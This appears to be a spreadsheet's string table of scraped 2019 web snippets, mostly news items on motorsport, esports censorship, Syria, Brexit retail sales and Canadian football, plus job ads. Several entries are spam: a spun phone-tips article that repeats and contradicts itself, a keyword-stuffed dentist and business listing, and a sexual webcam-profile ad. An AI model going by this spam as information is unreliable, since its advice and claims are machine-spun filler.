    <t>In post-race scrutineering of the FIA World Endurance Championship 6 Hours of Fuji, the #38 JOTA Sport LMP2 team lost their second-place finish as they were disqualified from the race due to a technical infringement. The car had looked to be in a strong position to take the trio of Anthony Davidson, Roberto Gonzales and Antonio Felix da Costa to their first victory together, but Nyck de Vries‘ outright pace in the #29 Racing Team Nederland saw them forced to settle for second. They had a great fight with the #37 Jackie Chan DC Racing car throughout the race and had managed to pass them for what was then the lead, before de Vries jumped them both in the pits, in the closing stages of the race. The stewards discovered that the “outside neutral switch is unable to disconnect the transmission”, which lead to the JOTA team’s disqualification. The bulletin stated: “At post-race scrutineering the disconnecting of the transmission was not working as it is written in Art. 11.3.2 of LMP2 Technical Regulations. “The competitor accepted the correct check made by the scrutineers and asked for an additional check with the car battery which was during the race. After this check the disconnecting was still not working.” JOTA could have opted to appeal the decision, but they decided not to. This means that the #37 Jackie Chan car moves up to P2 and United Autosports claim their first WEC LMP2 podium.</t>
  </si>
  <si>
    <t>One publication described Todd Phillips’s take on the DC villain as ‘the most disappointing film of the year’ See full article at Independent.co.uk » The post Joker reviews round-up: Critics split over ‘numbing’ and ‘nihilistic’ Joaquin Phoenix movie appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>St Augustine’s College will feature in an AFLQ Schools Cup final after a thrilling nine-point win by the junior side.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/DeY60y8YaQ4/blizzard-reduces-pro-hong-kong-hearthstone-player-blitzchungs-ban-2019-10 The banned ‘Hearthstone’ gamer at the centre of a China censorship furore spoke out for the first time after Blizzard reduced his ban The pro ‘Hearthstone’ player banned by US game giant Blizzard has spoken out after his ban from the ‘Hearthstone’ pro circuit was reduced from one year to six months, and his prize money was reinstated. Chung ‘Blitzchung’ Ng Wai was handed the ban after he shouted “Liberate Hong Kong, revolution of our age!” during a live post-game interview at a ‘Hearthstone’ tournament, with his prize money also withheld. On Saturday, Blitzchung published a personal statement in which he said he was “grateful” to Blizzard for reconsidering its stance, adding that he has “no idea” if he’ll keep playing competitive ‘Hearthstone.’ Blizzard’s CEO J. Allen Brack has said the “specific views expressed by Blitzchung” were not a factor in the firm’s decision to ban him, and also denied the firm’s Chinese connections played any part. Visit Business Insider’s homepage for more stories. The pro ‘Hearthstone’ player banned by Blizzard after voicing support for the Hong Kong protesters has spoken out after his ban was reduced and his prize money reinstated. On Saturday, the US games giant’s CEO J. Allen Brack published a statement on the firm’s website announcing that Blizzard will be reducing Blitzchung’s ban from one year to six months. In the statement, Brack also wrote “the specific views expressed by blitzchung [sic] were NOT a factor in the decision we made. I want to be clear: our relationships in China had no influence on our decision.” Blizzard will also reinstate prize money won by Blitzchung during a competitive tournament. Read more: Blizzard says its ‘relationships in China had no influence on our decision’ to punish an esports athlete who voiced his support for Hong Kong protesters Responding to Blizzard’s announcement, Blitzchung penned a personal statement via Twitter. “I’m grateful for Blizzard reconsidering their position about my ban,” read the statement. “Earlier this week, I told media that I knew I might have penalty or consequence for my act, because I understand that my act could take the conversation away from the purpose of the event. “In the future, I will be more careful on that and express my opinions or show my support to Hong Kong on my personal platforms.” Read more: Blizzard says its ‘relationships in China had no influence on our decision’ to punish an esports athlete who voiced his support for Hong Kong protesters Blitzchung added that he “appreciated” both the ban reduction and the reinstatement of his prize money, and urged Blizzard to “reconsider” its ban on the two casters who appeared alongside him when he made his controversial remarks. He also said he had “no idea” if he’ll continue to play competitive ‘Hearthstone’. Blizzard initially banned Blitzchung from competing for a year and fined him all the prize money he won from the Hearthstone Grandmasters regular-season tournament (roughly $10,000), after he shouted “Liberate Hong Kong, revolution of our age!” during a post-game interview. Blizzard is partly owned by Chinese gaming giant Tencent, which holds a 5% stake, and was accused of kowtowing to Chinese sensitivity to all mentions of the pro-democracy protests currently raging in Hong Kong. The ban caused a political maelstrom last week, with gamers, politicians and even Blizzard employees expressing disapproval. Up to thirty Activision Blizzard employees reportedly staged a walkout at the firm’s Irvine, California headquarters in protest at Blitzchung’s ban, while Democratic Senator Ron Wyden of Oregon tweeted that “Blizzard shows it is willing to humiliate itself to please the Chinese Communist Party” on Tuesday. Gamers also started to use the Chinese character Mei from Blizzard game ‘Overwatch’ as a mascot in pro-Hong Kong memes and posts on social media. Blitzchung is still facing a ban, and though Brack denied any Chinese influence on that ban, he did admit to mismanagement of the situation. “In hindsight, our process wasn’t adequate, and we reacted too quickly,” the Blizzard CEO wrote. SEE ALSO: Furious fans are hitting back at Blizzard by using one of its characters in anti-China memes after the gaming company punished a pro gamer for defending the Hong Kong protests Join the conversation about this story » NOW WATCH: How Area 51 became the center of alien conspiracy theories Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/DeY60y8YaQ4/blizzard-reduces-pro-hong-kong-hearthstone-player-blitzchungs-ban-2019-10 The post The banned ‘Hearthstone’ gamer at the centre of a China censorship furore spoke out for the first time after Blizzard reduced his ban appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Kurdish forces under attack from Turkey in Syria say they need to focus on protecting their cities. The post Turkey Syria offensive: Guarding IS prisons no longer a priority, say Kurds appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>15 October 2019 – BBC News An analysis in Wales has found that the rate of newborn babies involved in care proceedings has more than doubled in three years. In other words, newborns in Wales are now more likely to appear in care proceedings than those in England. Courts can put a child into council care if they are being harmed, or are likely to be harmed at home. The report aims to shine a light on the family justice system, but said more work is needed to explain the trend. Source</t>
  </si>
  <si>
    <t>To stay connected, you need a cell phone. But, it can be difficult to stay abreast of the latest technology. There are all kinds of advances that make it absolutely necessary that you develop at least a bit of expertise regarding cell phones. The following article presents all the info you need to master your cell phone. TIP! Don’t assume your phone is broken if you drop it in liquid. The best thing you could do is to take the battery out and place your phone into a bowl that has dry rice. Turn off your cell phone every now and then to free up the phone’s memory. Performing this function is the best way to ensure that the phone is working at optimum levels at all times. TIP! There is no need to update to a new phone so quickly. Generally speaking, you won’t get much reward. You may not need the newest phone the day it hits the market. It is not always worthwhile. The updates may only be small. Look at reviews for any new phone you are considering purchasing. Most of the time, you don’t. TIP! If you own a smartphone, you probably use it fairly consistently throughout the day. Turn your phone off periodically. Is your battery dying quickly? If so, you might have a weak signal. Weak signals can actually kill a battery. When not using your cell phone, don’t store it in a signal-less location like closets or drawers. TIP! Does your cell phone not stay charged as long as you would like? This might just be due to a weak signal. Believe it or not, a weak signal can drain a battery. Your smartphone will slow down as it gets older. Over time, simple things like updating apps may become cumbersome. At this point, a choice will have to be made. Your choices are typically going to be sticking with what you know, or moving up to a newer make and model. TIP! Be very careful regarding extended warranties. These added costs are typically unnecessary. Keep water away from your cellphone. It is common to accidentally drop a cell phone in a body of water and destroy it. Just keep it away from moisture. Though you may feel invincible, accidents are common. TIP! If you want to buy a smartphone, be sure it’s what you need first. Smartphones are costly, but they have lots of benefits. There is no harm in checking out all of your options. While you may be accustomed to a certain interface or screen layout, keep an open mind. You may find another phone is more functional than what you’re used to using. TIP! If you have always been a loyal customer of a particular brand of cell phone, do not be afraid to experiment with other options. Be open minded even if you’re used to a certain layout or interface. Recharge the battery on your phone before it completely dies out. Cell phone batteries are designed to be recharged periodically. If you let it die, it will not perform to the highest standard. Charge your phone before the battery goes dead. TIP! Don’t buy a smartphone if you’re just getting a cell phone to talk to others. Everyone has smartphones these days; however, but m any use the functionality to browse the web and send emails rather than talk. We all have to talk to others it seems, and that means we have to keep up with the technology that’s out there. The above article has provided you with useful advice. Hopefully you are now comfortable with how to figure out what your phone does and how you can deal with the apps and things it comes with. TIP! You should buy a new phone every couple of years. The newest phones work best with most sites online. Most people want to know about mobile voip rates comparison , but do not always know how to go about it on there own. This article contains all the information you need to gain a solid footing when it comes to mobile voip rates comparison . It is up to you to apply the ideas you have reviewed.</t>
  </si>
  <si>
    <t>The Australian Sports Anti-Doping Authority has reiterated that Thymosin Beta 4 was a banned substance at the time it was injected into Essendon players in 2012.</t>
  </si>
  <si>
    <t>Luis Pérez Contreras posted a photo: Festival WARM UP 2019. Murcia, Sain. Recent Uploads tagged</t>
  </si>
  <si>
    <t>Joel Bramley posted a photo: Happy Saturday evening everyone, hope you are enjoying the last</t>
  </si>
  <si>
    <t>The GOODS from Strange Fellows Brewing Vancouver, BC |As the General Manager of the tasting room at Strange Fellows Brewing, you will be responsible for managing and operating the tasting room and retail area of the brewery, including: – Lead by example as a working manager in our tasting room. Be a leader to others as well as a source of positivity and energy for the room – Manage and motivate staff along with rationalize any issues/challenges that may come up on a daily basis – Convey core brand messages and ideals to staff, customers and patrons of the business – Open and close the tasting room as needed, along with all duties required therein: Cash-in, cash-out, dealing with customers, ensuring opening/closing duties are completed, handling refunds and discounts – Running reports for tasting room on a daily basis and conveying this information to the rest of the managers via WhatsApp – Handle customer inquiries relating to tasting room, retail area, special events, art gallery, brewery tours and any other information requested – Handle all service contracts associated with this space; including, bar towels, equipment contracts, service contracts, cleaning, repair, etc. on an as needed basis – Do the right thing for the business at all times. Service with a smile and go above and beyond at every opportunity – Help manage our in-house food program, along with the relationship with Tacofino, which includes ordering supplies, managing inventory, and keeping on top of trends – Work closely with production, marketing and administrative teams to ensure the tasting room is aware and prepared for different initiatives and events throughout the year – Taking the lead on hiring, managing, promoting, disciplining and dismissing all employees in the tasting room – Onboarding new hires and roll-out/train staff on new company initiatives – Create monthly schedules and ensuring that tasting room is properly staffed for all day parts and sales volumes – Drive sales and marketing initiatives to build business in the tasting room Qualifications and Education Requirements: It is expected this person will be educated with at least a college diploma, and have experience working and managing a bar. This person should understand the hours involved and demands associated with managing staff, running a bar and being a general manager of a tasting room. – Serving it Right certification – Foodsafe Level 1 certification – Standard First Aid certification – Valid driver’s license – Understanding of Microsoft Office: Excel, Word and PowerPoint Preferred Skills and Expectations: As the FOH manager, you will be expected to have a regular presence in the tasting room and retail area, especially at the busier times. It is expected this person will be available for full time hours, in addition to helping with other small duties that may arise both in the front and back of house. Specifically, the skill-set our manager will have includes: – An ability to work in a small, team focused environment, often directly with the owners – A keen ability to communicate and convey ideas and feedback in a positive and constructive manner – Experience with POS and reporting needed to manage a bar – Able to train others for various positions – Ability to take direction while working independently and collaboratively – Trustworthiness, honesty, and humility Start Date: December 1, 2019 or sooner if possible Remuneration: Commensurate with experience Reporting to: Nick Black, Iain Hill &amp; Aaron Jonckheere ABOUT US | Strange Fellows is a brewery inspired by tradition and creativity that goes beyond the ordinary to celebrate that which is strange and extraordinary. Located in East Vancouver, our brewery has a tasting room, retail area, art gallery and production facilities. Strange Fellows Brewing is an equal opportunity employer. We are committed to a diverse and inclusive workplace, free from discrimination. We believe bringing together people of all backgrounds, experiences and abilities is essential to our success. Interested candidates should send their resumes to jobs [at] strangefellowsbrewing.com prior to October 25th, 2019. We would like to thank everyone for their interest, however only those individuals who will be offered an interview will be contacted. Strange Fellows Brewing Neighbourhood: East Vancouver 1345 Clark Dr. | 604-215-0092 | WEBSITE Front of House General Manager Position Available at Strange Fellows Brewing Beer Brief, Vol. 28</t>
  </si>
  <si>
    <t>submitted by /u/JohnHopkins67 [link] [comments] Apple Next iPhone Pricing Could Be High Due To The Use Of New Materials And A 5G Modem</t>
  </si>
  <si>
    <t>Queensland parents have taken to an online learning tool available through school websites in droves to learn about the issues affecting their children the most.</t>
  </si>
  <si>
    <t>More than one million Californians were in the dark on Wednesday in the first phase of a multi-day power shut-off aimed at curbing wildfire risks amid high winds and hot, dry conditions.</t>
  </si>
  <si>
    <t>Woodstock trip 2019 The post Woodstock trip 2019 :) appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>FIFA has ordered Cardiff City to pay Nantes $A9.7 million, the sum agreed as the first instalment for the transfer of Emiliano Sala, who died in a plane crash before kicking a ball for the club.</t>
  </si>
  <si>
    <t>The US plans to evacuate 1,000 troops from northern Syria as Turkey military advances. Amid the unrest, family members of Islamic State fighters are reported to have escaped a camp that housed thousands of displaced people. It was at this camp a BBC journalist met three orphaned children, from London. Their parents had taken them to live in the Islamic State's caliphate five years ago. Also in the programme: We go to Poland where the governing Law and Justice Party looks set to win today's elections ; and to Tunisia where the north African nation is holding its second election since becoming a democracy. (Photo:A Turkish-backed Syrian fighter fires towards the border town of Ras al-Ain on October 13, 2019. Credit: Nazeer Al-khatib / AFP/Getty)</t>
  </si>
  <si>
    <t>Ripple short-term movement locked between the simple moving average support and resistance. The looming triangle breakout is likely to elevate Ripple’s price to highs between $0.26 and $0.2650. Ripple’s upward movement continues to hit snags even though the market is generally trending north. The price at the time of writing is trading above the simple moving averages whereby the 50 SMA on the one-hour chart is providing immediate support at $0.2521 while the 100 SMA is in line to offer support around $0.2488. Like a majority of digital assets on the market, Ripple is struggling with increasing selling activities. It has corrected lower 0.25% on the day to trade at $0.2529 after opening the session on Thursday at $0.2536. The prevailing trend is strongly bearish based on the cryptocurrency live rates while the volatility is shrinking. A forming short-term triangle pattern is approaching a breakout. This follows the trading of a lower high pattern due to the rejection faced around $0.2650. On the downside, XRP is also trending upwards above a short-term accelerated trendline. The breakout from this triangle could propel XRP towards the next hurdle at $0.26-0.2650 (supply zone). On the flip side, if a breakdown occurs XRP is likely to retest the support at $0.2450 and $0.2350 respectively. XRP/USD one-hour chart</t>
  </si>
  <si>
    <t>Clouds And Atmosphere Clouds And Atmosphere - After the 'Gota Fria' storms that had created havoc in this part of Spain I finally made it out onto the mountains forContinue reading The post Clouds And Atmosphere appeared first on Scottish Landscape Photography.</t>
  </si>
  <si>
    <t>A man has been charged 11 months after a pedestrian was struck and killed by car while crossing Chapel Street.</t>
  </si>
  <si>
    <t>Supplied footage obtained on October 2, 2019 of a man who police are seeking over a shooting at a home in Mt Gravatt in Queensland. After 9pm on September 15 a man approached a house and fired two shots into the front glass doors before fleeing in a car. (AAP Video/Supplied/Queensland Police) NO ARCHIVING, EDITORIAL USE ONLY</t>
  </si>
  <si>
    <t>A council decision blocking a three-storey beachside development has been overturned by the state’s planning tribunal.</t>
  </si>
  <si>
    <t>Sky News contributor Scott Emerson says "you can understand people are getting more and more focused on their health" after a recent study shows men have become more health-conscious. His comments came after The Courier-Mail reported Australian men are cutting back on alcohol and eating less meat, to instead focus on health and wellness to both look and feel good. "We can laugh about it whether they're eating less and having their herbal teas or they're doing their bicep curls at the gym, but there [is] actually a serious point to the fact that men need to be going to their [doctors]", he told Sky News host Peter Gleeson. Image: Getty</t>
  </si>
  <si>
    <t>James Neal had his first career four-goal game and the Edmonton Oilers beat the New York Islanders 5-2 on Tuesday night. CBC | Sports News</t>
  </si>
  <si>
    <t>Peace River, originally named Peace River Crossing, and known as Rivière-la-Paix in French, is a town in northwestern Alberta, Canada, situated along the banks of the Peace River, at its confluence with the Smoky River, the Heart River and Pat’s Creek. Kid Friendly Dentist Near Airdrie Some dental offices do have employees who facilitate this, offering advice on places to stay near the office. says the. We zeroed in on the electric toothbrushes in this article as being some of the best out there based on 2018-06-21 · Laurie from Texas, One simple and inexpensive remedy you can try is magnesium chloride oil applied to your calves and actually both legs, butt and back to see if the mag oil will allow that muscle group to relax and relieve pressure on your spine. Airdrie Dentists Now Accepting New Patients! Airdries Newest Dental Clinic is Now Open – Get in touch today to book your appointment, walk-ins available. We follow the 2018 Alberta Dentists Fee guide, making dental treatment more affordable. Business For Sale Calgary. Showing Calgary Businesses currently available for sale. Find Calgary business opportunities to buy and sell from established high cash flow businesses to small home based businesses for sale. Herd health consultations necessary to buy antimicrobials – In Alberta, as with most. in Airdrie and has launched his own consulting and subscription service for producers called, Calgary (/ ˈ k æ l ɡ r i / ) is a city in the Canadian province of Alberta. It is situated at the confluence of the Bow River and the Elbow River in the south of the province, in an area of foothills and prairie, about 80 km (50 mi) east of the front ranges of the Canadian Rockies. Bayside Dental &amp; Orthodontics serves patients in Airdrie Alberta and the surrounding areas. We offer affordable family dentistry in Airdrie. Book your visit! New patients are welcome. Best Dentists in Airdrie, AB – Airdrie Choice Dental, Bayside Dental &amp; Orthodontics, Blunston Dental Group, North Main Family Dental, Sierra Springs Dental, Kingsview Dental, Nose Creek Dental Centre, Grace Family Dental, Sonata Dental, Yank.</t>
  </si>
  <si>
    <t>My Kinks: I do not like being rude, be polite with me and I’ Webcam profile: Hi guys! Don’t hesitate to visit me: I am a lovely, tender, and sexy girl who is very able to fullfill your desires. I enjoy everything in life. Very active and joyfull girl who loves to have good times. I would like to give you funny experiencies, something like a reminder when you thinking crazy and naughty adventures. If you want to relax and have a unforgettable experience come over! Favourite sex position: What I do in my amateur show: What I don’t like: Gallery</t>
  </si>
  <si>
    <t>The centre-left Socialist Party collected the most votes in Portugal’s general election Sunday, leaving it poised to continue leading the government for another four years. CBC | World News</t>
  </si>
  <si>
    <t>Geelong teen Georgia Brown has been remembered as a ray of sunshine with a zest for life.</t>
  </si>
  <si>
    <t>David Lipson</t>
  </si>
  <si>
    <t>My final weeks here were filled with despair for Indonesia. It felt like all the hard-fought progress that started with Reformasi 20 years ago was being washed away, writes David Lipson as he signs off as the ABC's Indonesia correspondent.</t>
  </si>
  <si>
    <t>Pat Steinberg</t>
  </si>
  <si>
    <t>It’s great to see Pinball Clemons back with the Toronto Argonauts. While many were caught off guard when the Argos replaced general manager Jim Popp with Pinball last week, it’s hard not to like the hire. Now that the excitement surrounding Pinball’s return to the GM chair has died down, though, it’s time for Toronto to start tackling a trio of important off-season questions. What are they doing at quarterback? Toronto started searching for Ricky Ray’s successor before the Hall of Famer called it a career, which was the right proactive approach. Unfortunately for the Argonauts, they haven’t definitively found their guy yet. Figuring out their long-term plan at the game’s most important position has to be priority number one, but is far easier said than done. Toronto can’t just snap their fingers and find the next franchise quarterback. Instead, the Argos probably have to break this task down into a couple smaller ones, starting with their internal situation. Is there a potential number one pivot in the fold right now? RELATED » Jim Popp relieved of duties as Argos’ GM » Argos name Michael ‘Pinball’ Clemons general manager » Chez Says: Pinball gives Argos instant credibility The two candidates would be McLeod Bethel-Thompson and James Franklin, with the former coming off a strong outing Friday at home to Ottawa. Of the two, Bethel-Thompson has been the more impressive and consistent this season, and probably going back to last year, too. What Pinball needs to decide is whether a 31-year-old journeyman quarterback is an ideal candidate to be a long-term starter. From the outside, I like the idea of bringing Bethel-Thompson back. Even if the Argos look outside the organization for their next quarterback, Bethel-Thompson is a solid fallback plan and a good veteran to have in the fold. I’m less certain on what I’d do with Franklin, mainly because we’ve seen his form fluctuate so much in two seasons with Toronto. The second question to tackle is a little juicier: does Pinball have an external candidate in mind? A number of potential names come to mind when thinking about a potential fit. Nick Arbuckle is the one that jumps out right away, mainly because he’s probably not elevating beyond number two on Calgary’s depth chart anytime soon. With Bo Levi Mitchell under contract for the foreseeable future, Arbuckle will likely need an opportunity elsewhere to start. He was impressive in Mitchell’s absence earlier this season and opened a number of eyes in the process. A little more complicated is Hamilton’s situation. With the way Dane Evans has played since Jeremiah Masoli’s season-ending injury, the Tiger-Cats have a decision to make this winter. Because he hasn’t played in so long, it’s easy to forget Masoli is the defending East Division MOP and had entered the elite conversation in 2018. But with Evans presenting a viable, and less expensive, option going forward, I’m fascinated what Hamilton decides. Regardless, one of Masoli or Evans could very well be available come the off-season if the Argos are so inclined. How do they feel about Corey Chamblin as head coach? For various reasons, Chamblin’s first season as head coach in Toronto hasn’t gone as planned. The interesting part here is that Pinball is inheriting a head coach, which is always crapshoot when trying to predict the future. Sometimes a new GM is comfortable with the coach already in place, but many times a new decision-maker wants to bring in his own guy. Despite a rough first season in Toronto, I like a lot of what Chamblin brings to the table as a head coach. He brings a strong defensive mind to the position, has a Grey Cup ring, and at 42, is young enough to easily relate to his players. In saying that, you can’t ignore the fact Chamblin-coached teams have lost 17 of their last 19 games, dating back to his final year with the Riders. Buy Week 19 Tickets » Friday, 7:00 p.m. ET: Toronto at Montreal » Friday, 10:00 p.m. ET: Saskatchewan at BC » Saturday, 4:00 p.m. ET: Ottawa at Hamilton » Saturday, 7:00 p.m. ET: Winnipeg at Calgary Chamblin said last week he wouldn’t be interested in taking a step back and becoming defensive coordinator if asked, which is understandable. As such, it comes down to whether Chamblin is the right fit as head coach, which is in the hands of Pinball. Which veterans are part of the plan? Perhaps the biggest decisions faced by Pinball, and new VP of football operations John Murphy, is what to do with a number of high profile veterans going forward. The Argos have numerous big names, and big salaries, specifically on offence, and this management group needs to determine who fits and who doesn’t. The biggest names are probably on offence, led by receiver Derel Walker. The Argos splashed some big cash on Walker in free agency ahead of this season, but does he fit the long-term plan? The same question applies to fellow receivers SJ Green and Armanti Edwards, along with tailback James Wilder Jr. It’s unlikely Toronto will go forward with all of the names above, which will open up salary flexibility for other moves this off-season. It’ll also likely put a few big names on the open market, which is something else to keep an eye on come winter. Quick hits I don’t know exactly how they do it, but the Eskimos have to keep Shaq Cooper involved in their offence, even with CJ Gable healthy. Gable is an extremely reliable and consistent tailback, but look at what Cooper has done when given a chance. Cooper helped Edmonton to a 19-6 win over BC on Saturday, which clinched a playoff spot in the process. Cooper finished the night with 94 rushing yards and a touchdown. In two starts this season, Cooper has averaged 111 rushing yards and a touchdown, which is something the playoff-bound Esks can’t ignore. Friday night’s back and forth battle between Calgary and Saskatchewan was a lot of fun to watch and drove home an important point for me: there is very little between these two teams. Even with seeding still to be decided, there’s a high probability the Riders and Stamps meet in the West Division playoffs at some point. After Friday’s showdown, sign me up for another round. Of course, the Winnipeg Blue Bombers have a big part to play in how things play out. The Bombers took a much-needed 35-24 win over Montreal on Saturday afternoon, which puts them a half game back of Calgary and Saskatchewan for top spot in the division. After three straight losses, and setbacks in four of five, Winnipeg needed a solid outing like that against a quality opponent. The Bombers finish the season with a huge test: a home-and-home set with the Stampeders before hitting their final bye in Week 21. With a pair of games left with the team they’re chasing, Winnipeg still has eyes on first.</t>
  </si>
  <si>
    <t>Clueless works because it is not dark and granular. It’s the antithesis to contemporaries like Se7en – and it lasted just as well</t>
  </si>
  <si>
    <t>Olivia Maragna</t>
  </si>
  <si>
    <t>Here are a few options that may help you stay in the workforce and earn income for longer</t>
  </si>
  <si>
    <t>The ever-reliable Michael Hooper, at the age of just 27, is on track to smash a world record during this year's Rugby World Cup.</t>
  </si>
  <si>
    <t>New research has found that our fat storage and removal rate slows with age, but it probably doesn't have to be this way.</t>
  </si>
  <si>
    <t>Alongside partner BA Holidays, the programme will encourage UK travellers to visit destinations including Antigua &amp; Barbuda, Barbados, Grenada, Jamaica, St Kitts and Tobago. Caribbean Tourism Organisation launches new UK ad campaign The post Caribbean Tourism Organisation launches new UK ad campaign appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Stream/Download: http://maddecent.fm/Layle Follow Mad Decent Weekly on Spotify: http://maddecent.fm/mdweekly Subscribe to Mad Decent on YouTube: http://www.maddecent.fm/youtube OMAR SOULEYMAN Facebook: https://www.facebook.com/OmarSouleyman2/ Twitter: https://twitter.com/osouleyman SoundCloud: https://soundcloud.com/omar-souleyman Instagram: https://www.instagram.com/osouleyman/ FOLLOW MAD DECENT Facebook: https://www.facebook.com/maddecent Twitter: https://twitter.com/maddecent SoundCloud: https://soundcloud.com/maddecent Instagram: https://www.instagram.com/maddecent/ Web: http://maddecent.com Subscribe to Mad Decent on YouTube: https://maddecent.lnk.to/YouTube #maddecent #OmarSouleyman #Layle The post Omar Souleyman – Layle (Official Full Stream) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Feel free to come up with a probable headline of your own… Fastest-Healing Mouse in All Mexico Predicts Speedy Recovery Halloween Etiquette: Can’t Say Boo Founder of Wuss Nation Says Use of the Word “Boo!” Is Wuss-Phobic Millions Point Out the Oxymoron 0 0</t>
  </si>
  <si>
    <t>The body that awards the annual Nobel prize for literature will name two winners this week</t>
  </si>
  <si>
    <t>Older Brits are more likely to opt for multi-destination holidays – breaks where they take in several locations and experience many sites – than the younger generation. Daily Express :: Travel Feed</t>
  </si>
  <si>
    <t>Delivery driver for Printing company ***** URGENT ***** Full-time, Permanent Solution Print is currently seeking a Delivery Driver to join our team in Dorval, Québec. JOB DESCRIPTION: • Take part in preparing and loading orders into trucks for deliveries. • Inspection of trucks done every morning. • Delivery and pick up in and around the .. Read more</t>
  </si>
  <si>
    <t>Finlay Greig</t>
  </si>
  <si>
    <t>The show is officially returning for a fourth season The post Stranger Things season 4: release date, cast and everything else we know as Netflix trailer teases the next series appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Ken Reed</t>
  </si>
  <si>
    <t>Our children have never been more sedentary. According to the Centers for Disease Control and Prevention, in 2016, only 21.6 per cent of children and adolescents in the United States aged six to 19 met the recommended 60 or more minutes of moderate-to-vigorous activity at least five times a week. It’s a safe bet that number is even lower today. Moreover, while physical education and recess time continues to be cut by schools, less than half of the children in the U.S. have adequate heart and lung fitness. The overall health implications of this level of physical inactivity are certainly scary. For example, Type 2 diabetes once was considered an adult disease, hence the term “adult-onset diabetes.” However, because more kids are overweight and obese, the incidence of the disease has increased dramatically in children and adolescents. The popular perception is that the U.S. is a sports-mad country. The reality is, it’s a country of passionate sports fans that, for the most part, aren’t sports participants. Adults and children need to move more and watch less. Collectively, in terms of participation in sports and other physical activities, we are a bunch of couch potatoes. “Research has shown that lack of physical activity may be a more significant factor in contributing to childhood obesity than even bad diet,” according to Tom McMillen, former Congressman, National Basketball Player player, and current board member of the National Foundation for Physical Fitness, Sports and Nutrition. He adds: “Other research in adults indicates that poor fitness is a more significant predictor of death than obesity generally, diabetes and other causes. In other words, the most important thing we can do for the health of our kids is to get them up off the couch.” Forty-five years ago, daily physical education was the norm for kindergarten to Grade 12 students. Today, according to the American Heart Association, less than five per cent of elementary schools and two per cent of high schools have daily physical education class for the entire school year. In addition, nearly a quarter of American schools don’t require physical education class at all! The problem isn’t just the decline in phys-ed, however. Too many of our kids are being priced out of youth sports and other physical activities. Economic and cultural differences, like income, the neighbourhood a child lives in, the language spoken at home, and other factors leave too many children on the sideline. The mound of studies highlighting the benefits of physical activity continues to grow. Research has shown that exercise is not only good for the body, it also promotes self-esteem, and can sharpen concentration and boost academic performance. Cardiovascular-based exercise is the one thing that can actually grow brain cells. It’s sad when as adults we choose to lead inactive lifestyles. But it’s even sadder when we don’t provide our children the opportunity to establish physically-active lifestyles when they are young. Here’s the reality of the situation: Our children are on pace to be significantly more overweight and obese than we are by the time they reach adulthood. If we continue to cut physical education and recess in our schools, and neglect to effectively address economic and cultural barriers to participation in youth sports and other physical activities for a large number of our children, the physical and mental health challenges our young people will face in adulthood will be daunting. Ken Reed is sports policy director for League of Fans (leagueoffans.org), a sports reform project. He is the author of The Sports Reformers, Ego vs. Soul in Sports, and How We Can Save Sports. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post We need to get children off the couch appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Brexit fears fuel worst-ever September | News UK retail sales decreased by 1.3% year on year in September, the latest British Retail Consortium (BRC) and KPMG Retail Sales Monitor has revealed, making it the worst September since records began in 1995. The decline was compared with an increase of 0.7% in September last year. On a like-for-like basis, UK retail sales fell by 1.7% for the month, having dropped by 0.2% the preceding year. The decline was worse than the three and 12-month average declines of 0.8% and 0.4% respectively, making it the lowest 12-month average since August 2009. Online sales of non-food products suffered a similar fate and grew just 0.7% in September – the worst growth ever recorded. This was against a growth of 5.4% in September 2018. Similarly, non-food retail sales in the three months to September decreased by 1.7%. This is below the 12-month total average decrease of 1%, a new record low. Paul Martin, UK head of retail at KPMG, said: ”Ongoing Brexit uncertainty is clearly having a material impact on the consumer psyche, with all but one non-food category being in decline in September. Consumers are choosing to focus on the essentials, with food one of the few categories delivering growth. ”We will likely experience increased promotional activity to clear surplus stock, which doesn’t bear well for retailers desperately trying to make up for lost ground after several difficult months. “Retailers’ focus needs to be on cost and efficiency with only the leanest and most efficient operations coping with this extreme test of endurance. October, and the ramping up of Brexit plans, will clearly be a real test for the industry as a whole.” Helen Dickinson, chief executive of the BRC, added: ”With the spectre of a no-deal weighing increasingly on consumer purchasing decisions, it is no surprise that sales growth has once again fallen into the red. Many consumers held off from non-essential purchases, or shopped around for the bigger discounts, while the new autumn clothing ranges suffered from the warmer September weather. The longer-term prospect continues to be bleak, with the 12-month average once again plumbing new depths at a mere 0.2%. Online non-food sales growth was the lowest on record, though still compared favourably to the decline in growth at physical stores. “With four months of negative sales growth since March, the ongoing political gridlock surrounding Brexit is harming both consumers and retailers. Clarity is needed over our future trading relationship with our closest neighbours, and it is vitally important that Britain does not leave the EU without a deal.” !function(f,b,e,v,n,t,s) if(f.fbq)return;n=f.fbq=function() n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments) ; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version=’2.0′; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)(window,document,’script’, ‘https://connect.facebook.net/en_US/fbevents.js’); fbq(‘init’, ‘174420919877221’); fbq(‘track’, ‘PageView’); Original Source Follow us on Twitter Amazon’s 30-Day FREE Trials The post Brexit fears fuel worst-ever September | News appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Ten people are in hospital, four are dead and two are still missing a day after a bridge popular with tourists collapsed into a harbour in north-eastern Taiwan, crushing several fishing boats.</t>
  </si>
  <si>
    <t>A ZIMBABWE Revenue Authority (Zimra) officer who allegedly forged customs documents to facilitate the smuggling of 50 cars into the country, prejudicing the State of US$432 767,54 and $1,4 million in potential revenue, has been denied bail pending trial. Norest Ushe, who is stationed at Plumtree Border Post, allegedly fraudulently accessed his employer’s data capture system and entered 50</t>
  </si>
  <si>
    <t>Sarah Curnow And Lucy Carter</t>
  </si>
  <si>
